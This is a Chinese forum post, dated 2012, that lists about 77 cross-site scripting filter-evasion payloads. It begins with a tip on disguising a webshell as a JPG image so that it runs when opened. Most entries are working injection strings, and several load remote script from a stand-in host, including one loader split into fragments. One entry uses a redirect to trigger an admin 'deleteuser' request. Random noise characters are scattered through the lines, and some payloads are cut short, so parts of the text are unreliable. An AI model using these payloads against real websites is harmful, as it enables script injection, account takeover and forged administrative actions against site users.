跨站图片shell7 O5 Y3 Q' w/ F2 B/ _
XSS跨站代码 <script>alert("")</script>; M* X/ T# B" I6 N6 E2 G6 b
$ b$ h* {& t" [* g" j% b
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马$ k; [- K2 E3 M- q
. Y% c1 X% j& i
% |2 R, ]3 D; H% z
! w: U6 ^3 w- X
1)普通的XSS JavaScript注入
- w& I' K# Q" w<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" E: n/ }/ D; _4 [3 y& E2 I4 O* ]
' A: ]# N0 m6 A0 p- Q1 w(2)IMG标签XSS使用JavaScript命令* `8 \% l- u6 r2 G* B! \; p$ G
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' H& x) H2 ~9 g0 Y1 B( H) d
# b" ^# s, z9 N; Q3 `2 H$ @(3)IMG标签无分号无引号" s6 y8 e$ z3 Y: p
<IMG SRC=javascript:alert(‘XSS’)>: l; i6 g" A& e& d" G( x
, ~2 T4 l t) J(4)IMG标签大小写不敏感
4 e7 t: m# M5 ] K- L5 q6 m<IMG SRC=JaVaScRiPt:alert(‘XSS’)>7 I5 w* S. M2 o! L
% {& f. n. H; g' F+ g(5)HTML编码(必须有分号)
- l0 ?* ?- e* w1 \; x6 x# k<IMG SRC=javascript:alert(“XSS”)>
0 M6 F' T" ], c0 g. z4 O0 c& }4 t& i, Q$ K
(6)修正缺陷IMG标签
4 u$ V8 W8 Z; F7 j+ ]7 z" ~+ M<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>; E) P- \" p: E: W; H
4 U" p! f. c0 w(7)formCharCode标签(计算器)
8 A$ E: J# P2 q5 h) R* j<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
8 }: V% h/ r! D, `9 \+ c0 j% b
- g5 G0 P% m6 t8 \(8)UTF-8的Unicode编码(计算器)( K! f+ N) U- } v9 ^7 `- R
<IMG SRC=jav..省略..S')>
# t. \& P# q) @( i7 ~' T5 C. q2 u$ C* a$ x5 W: T* U
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)/ \. P6 O7 L% Q0 ]
<IMG SRC=jav..省略..S')>
; r& r7 j1 b" e0 Y2 G% U) S
# }& S' i* I! Q. ](10)十六进制编码也是没有分号(计算器)0 J4 t) }: I) V! k
<IMG SRC=java..省略..XSS')>
' R! d! x( ] H% K" V2 h0 u& L$ }2 ~0 k6 d9 z0 V( J
(11)嵌入式标签,将Javascript分开: p$ c4 v+ \6 b( w# r( S8 b4 r3 \
<IMG SRC=”jav ascript:alert(‘XSS’);”>. B' U0 Q- C6 J4 e
. a3 j$ C7 g% Z2 K5 M6 }; C4 `(12)嵌入式编码标签,将Javascript分开
# h8 A) n g* k; c- \<IMG SRC=”jav ascript:alert(‘XSS’);”>1 W/ B: Z. l8 s; D2 M
7 d* ^# R1 G- D4 C(13)嵌入式换行符
+ g+ R; m# t. W0 s/ n<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 i' b& M; R, _& D# o) E5 j! g
6 E8 S% q7 g. z2 S(14)嵌入式回车4 d7 d, t% [" N7 Y5 J
<IMG SRC=”jav ascript:alert(‘XSS’);”>1 b6 q8 P8 g6 o* X
4 v$ F1 f3 o) f( X(15)嵌入式多行注入JavaScript,这是XSS极端的例子
" K( C1 {5 Q# [<IMG SRC=”javascript:alert(‘XSS‘)”>+ u/ {4 K: |4 f* H5 ~: M- E
% S( \& W7 ?9 K8 c(16)解决限制字符(要求同页面): x* w4 f; q4 B) G: }6 |. M$ \; _
<script>z=’document.’</script>
, `5 y5 Y2 _( E<script>z=z+’write(“‘</script>0 T* ~5 P- `) R" y. ?, E3 Z
<script>z=z+’<script’</script>+ [. e7 b# P! K+ M- g; G; j, [" ~
<script>z=z+’ src=ht’</script>4 ~. r! D& {5 s9 m5 t
<script>z=z+’tp://ww’</script>$ n" v8 Y6 }! h7 d/ c. K; d* p
<script>z=z+’w.shell’</script>
. h- ]8 X3 u- i" }3 K" ~<script>z=z+’.net/1.’</script>* y2 H1 U8 ^* d' M! _, q
<script>z=z+’js></sc’</script>* J5 s- f5 Y$ T' Q! q# M: c
<script>z=z+’ript>”)’</script>& O( N- O" \& f$ k
<script>eval_r(z)</script>* ~/ b" R6 p& p; C
+ t' H: \/ x# p
(17)空字符! } ]# N6 G+ E+ D
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
/ \: v+ @; P7 P9 S( N7 J" b7 @! W# ?2 ?& U2 a
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用: y) X+ o% l# [1 G+ f1 c: N. o: q
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
( D% {0 Z3 p* h" g
# K4 n$ |5 s, V/ I" t# p1 ](19)Spaces和meta前的IMG标签
4 Q1 j7 e" h) w7 x l- r& U<IMG SRC=” javascript:alert(‘XSS’);”>
+ l# c" e0 B3 {% X0 `; N% J7 a, h0 j+ h
(20)Non-alpha-non-digit XSS
7 i% v, F/ V' ~! ]<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>+ v7 r, E) d. Z
5 [" f. A! B% W, W( P(21)Non-alpha-non-digit XSS to 2
' s4 o: w( D7 H8 ?" N<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>- F9 k& {& F/ ^, @/ m5 p/ w7 H2 X
7 R, M0 I! [ F4 b8 u' p) R
(22)Non-alpha-non-digit XSS to 3; V% F6 @# G4 b$ k% ^6 c
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
6 {" S, B% M, O! b5 M, r1 O& q$ e
% O9 p5 f. N8 d" T: ~6 e(23)双开括号
' `( a! P; A% O7 E<<SCRIPT>alert(“XSS”);//<</SCRIPT>
$ i4 G( \# Y; M7 G, s% L7 S4 A1 v% I
(24)无结束脚本标记(仅火狐等浏览器) E# h6 K+ p( i9 l. U5 _
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
9 ^* K' `, g% _: ?; A& M7 R X8 y6 R M" A. Z
(25)无结束脚本标记26 R7 f& @, n( \& @3 m$ V
<SCRIPT SRC=//3w.org/XSS/xss.js>$ d& B4 k" d1 B
' ^; ?2 p, |/ l6 q) b7 S" U
(26)半开的HTML/JavaScript XSS
" @, [! L% Q% G6 [5 R7 y6 f& \/ M<IMG SRC=”javascript:alert(‘XSS’)”2 w6 Y. j# M+ f1 `
- k L1 z7 D8 I* `(27)双开角括号. f, ~9 ^6 Q& T6 w
<iframe src=http://3w.org/XSS.html <. i' e h( C3 K2 O4 A- ~5 e2 H
4 i7 z% H( ^/ ?7 A: c6 f(28)无单引号 双引号 分号
+ E6 i' H7 I$ A% ?<SCRIPT>a=/XSS/- h8 A& h) V7 v" c- v( Y
alert(a.source)</SCRIPT>1 q4 z/ d& c9 F! f
2 ^+ B% b; ?6 ?" N9 t3 @
(29)换码过滤的JavaScript
; X, B" F, k% e" z% ], f/ ~\”;alert(‘XSS’);//, K* N" n' ~1 _5 {
# l/ n A% a1 a" j(30)结束Title标签
' j O5 D8 ^7 S% W( f</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
5 {- l* Y/ Q% u0 ~7 J( N4 t2 J* f: q3 k7 @: Q! d s+ h
(31)Input Image) O( K9 q2 W% O5 W0 G
<INPUT SRC=”javascript:alert(‘XSS’);”>. J9 y$ O* R* ]$ v+ s! o
! i! @# k4 y5 b/ l' K3 W6 d, t. o. M
(32)BODY Image+ |- u0 f: O& _. u$ ~; T( s* V
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
4 _- [. ?( l4 L8 } z% o" R5 Y: i) ]" K1 S, ]; z' k9 c
(33)BODY标签% B2 G2 n! b% W' H; m) c4 i R" C# j
<BODY(‘XSS’)>, \# T3 A2 t& A( Z4 D
2 M' `* X6 T* C2 t7 X
(34)IMG Dynsrc' i0 c' a7 R: K) S" P7 n
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
" T! R! P' a# T7 J d6 s7 D& E! P9 z) D5 J0 @& ~
(35)IMG Lowsrc0 ]0 C! K, u( O. o
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
6 U2 `) T O% Y+ w) e
* g0 D% a8 c9 z(36)BGSOUND; i/ U% x! `/ @: l) Y
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
* U% ?3 `9 x# s7 e' Q& s# }& C
1 G. }. w! Q. q& Q; m9 e' R(37)STYLE sheet" C* h2 H3 n- a
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>( X" ? x: o; G' z- b4 t
$ G' Z/ t% x+ H M0 o1 e(38)远程样式表, M5 Q3 N9 l( o1 ?0 d
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”># m2 J4 M" ~- C1 a$ D7 k( L) N" c
- Y$ O5 K6 M5 y
(39)List-style-image(列表式)
$ G. A) d8 Q& L' ]<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
) M ]4 `0 C4 T* s" |3 Y- F8 m3 [. p2 x- c1 W) @% f3 V
(40)IMG VBscript
9 C' |8 p. s( y" z$ [: L6 J2 u7 `<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS2 p7 A/ J! y7 v, F
; R# o' B/ _+ [: m
(41)META链接url: O( J3 R6 ~9 Z7 T' E2 N V' j K
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
# @# {4 s' J" m) R% d* H2 k9 v: y$ L7 o/ D5 t
(42)Iframe
( T4 R- v, m7 D2 M<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
, K/ A5 h$ q ?6 J(43)Frame# n7 T7 h% q+ |* _6 b
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
! v' w: I4 ~+ @/ }
5 @; H* G* a& M3 c0 m6 i(44)Table
/ |/ \) j- B8 d: T<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>: Z3 ?6 z: v4 E& e
( ~" I7 N; }+ F9 y7 i* F(45)TD; m6 d& k% y6 i
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
8 U/ @( K5 F2 q2 Y% p. p3 V
& Z6 V# w* i; @) t' e" r( k(46)DIV background-image/ }) X" @3 x; ~: s- v7 V2 ?' p
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>( o) l1 T: V ^8 z
- C) ` j, a! M4 O, Q(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
8 O$ F5 D6 j! a; ?<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
! _: E' }- u% Z' `% t
- A+ B/ {$ r! J+ h+ [0 A(48)DIV expression
! [, B! a" w0 G' D( i<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
0 b1 C. w( ?7 Z% p1 s3 h; m) _: G$ H( P: Y
(49)STYLE属性分拆表达 u3 O1 \; [4 _
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
7 ]3 p) |# F7 H/ i: ^8 x
- e" p J& D' n! D9 [, P* }8 D+ q(50)匿名STYLE(组成:开角号和一个字母开头)
' U6 B1 U t( b* O; ]$ u& J& L<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>" y% t! }. M% J, ]5 G. U. A+ f2 n8 u
) \! R3 y* y" m6 Y(51)STYLE background-image
1 Z1 x8 K- s7 f% H, Y$ A$ e<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
3 v2 O: ]4 ~2 j) Z* u" E! _7 e- F0 U1 Q' R: H& e; o5 m1 O' \1 p& w
(52)IMG STYLE方式
% d4 K; B9 Z- H+ R6 Dexppression(alert(“XSS”))’>2 [ u/ p' r2 R3 }; g* a* f
4 M7 X, l E2 k(53)STYLE background4 Q0 c J. i& T" |; A, }; I3 t
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
6 j7 i6 x2 H3 f' c9 c C" F! f! m3 \& U2 L9 \
(54)BASE6 J# g2 e+ i3 K* l
<BASE HREF=”javascript:alert(‘XSS’);//”>: t' G3 a- [+ u% L- E" ~
1 X4 O& G# W/ T2 `' L) l+ k' X) {9 H
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS- P+ g( d' T$ M# E X) ?
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>! v0 ~- M! b# P" g
& M3 w/ B# e3 t v9 ]) C/ e(56)在flash中使用ActionScrpt可以混进你XSS的代码" l: o! Q! }- x8 j6 A2 U
a=”get”;, x5 p& A0 p6 ]) P% p2 o- b
b=”URL(\”";
" e1 G L0 |- d* h) m, Mc=”javascript:”;$ i! ] E) A$ B. {' f }; ~
d=”alert(‘XSS’);\”)”;! ?* m) E9 G* c2 {( C/ D
eval_r(a+b+c+d);) V: A4 R3 b A* `2 h; w
" K, y4 P: l# Z5 w
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
3 S/ `% j. G! n# O2 n" L<HTML xmlns:xss>
}8 d ]- i! V; k<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
6 M# Z8 H2 z) G& h. ?' w2 V<xss:xss>XSS</xss:xss>" s: I. i% o+ c [( l
</HTML>0 a' K7 s1 U5 P9 H
! t; e3 Y- s7 k. f- F! i H n(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
8 l3 _( J' ]$ U, q<SCRIPT SRC=””></SCRIPT>
' R, |/ h Q& q, F0 D
9 s s% j4 e( P- i+ w(59)IMG嵌入式命令,可执行任意命令/ y2 t: E7 S% k& m# y: A
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
0 ^' Q {" P7 z6 h5 W H6 I( f
W5 N! G; Q- z(60)IMG嵌入式命令(a.jpg在同服务器)8 T2 d& u6 E6 X( P: \. l
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser4 N- b/ x8 g* n8 n5 N5 e* D2 z
3 |+ ]; n3 T5 v7 ]: O! `. k8 a(61)绕符号过滤
! A# B7 D! m% s6 W3 D<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>& }- J7 A" ^: E# x y- R
9 N$ _5 _8 h: Q7 F$ e- J1 M+ P
(62)% W) b& D' h8 n( J, L3 e
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>8 L0 U N$ A5 H
4 p x0 Q+ l% A# O(63)& b+ w5 \9 o. P" n4 N
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
% u7 `0 _3 ]7 F3 a9 v- K
9 ?, u$ R( R0 _& h' r/ G(64)
# C+ B6 R3 h6 b" e$ Z |" ~<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
, j$ u9 s$ f0 k& `: f x V8 H$ o' D& D9 l9 i+ x! B( f
(65)
, F- Z+ }& f. M! i<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>9 E" W8 o1 m1 }/ G, [
( |0 c/ [8 Q' x
(66)# |- e C5 R! @+ V. z: x" b
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT># ~6 I$ w6 G6 H) g) h
) a; ^& v E4 B/ C+ q4 u(67)
6 V9 a+ m' I7 ~& }8 y- d- ]8 t<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>" L- x5 @) [( W. E
/ ^/ A" n1 Y5 F0 X) ?( G) d(68)URL绕行6 d( G4 H( o0 h/ S; X; j" W* j& X7 S
<A HREF=”http://127.0.0.1/”>XSS</A>
! {# U$ ~! ~7 v5 t: F7 W! y! x2 y) h$ ~- r7 C: w! w5 v
(69)URL编码
" _1 a$ w* v" i0 E$ B `) |' D6 g<A HREF=”http://3w.org”>XSS</A>
`7 T. P2 p* }$ F3 I$ H: e. _1 E* G! U
(70)IP十进制9 }9 j; M+ O" }9 P
<A HREF=”http://3232235521″>XSS</A>+ O% D9 B+ d8 F
7 R! _: _1 |' v: c+ {4 C(71)IP十六进制' \0 x$ v4 S4 L
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
$ c+ u7 [) M, U1 ` U+ k7 i+ A6 q' \
V$ M D6 d: [! E' S* Y* \(72)IP八进制
/ x) o2 c4 w% ~' ]9 i2 k<A HREF=”http://0300.0250.0000.0001″>XSS</A>7 I/ |4 q3 \6 F$ Z/ J
& ?$ J$ X+ ~2 ^6 q0 `6 }) ]9 @# V(73)混合编码
8 m0 ^4 O. |! F; Y<A HREF=”h
3 n4 e4 P5 P& c, ftt p://6 6.000146.0×7.147/”">XSS</A>2 i/ A1 t8 t& y) f# ^
9 ]7 e8 f$ g& k
(74)节省[http:]
9 J) y$ t1 {1 S- _<A HREF=”//www.google.com/”>XSS</A>' a9 M4 U* B$ `/ K7 `# s
( a6 P$ H1 v. M
(75)节省[www]# |- q2 n' O! z# ~* \9 q4 p" }
<A HREF=”http://google.com/”>XSS</A>
1 C) P4 n: k+ A! d- M: ~7 F
) A$ ?: m- l5 v9 y9 @" q(76)绝对点绝对DNS
$ U# L* a$ R6 u<A HREF=”http://www.google.com./”>XSS</A>
' Q+ E; i+ j" i. ]1 V& d: l
& W+ p$ O" v1 b7 D: U: g3 e(77)javascript链接
- u! K4 W9 Y0 ]4 n1 x9 X<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
2 Z2 e6 p# h# l3 ~( O7 l |
发表于 2012-9-13 17:04:56
收藏
支持
反对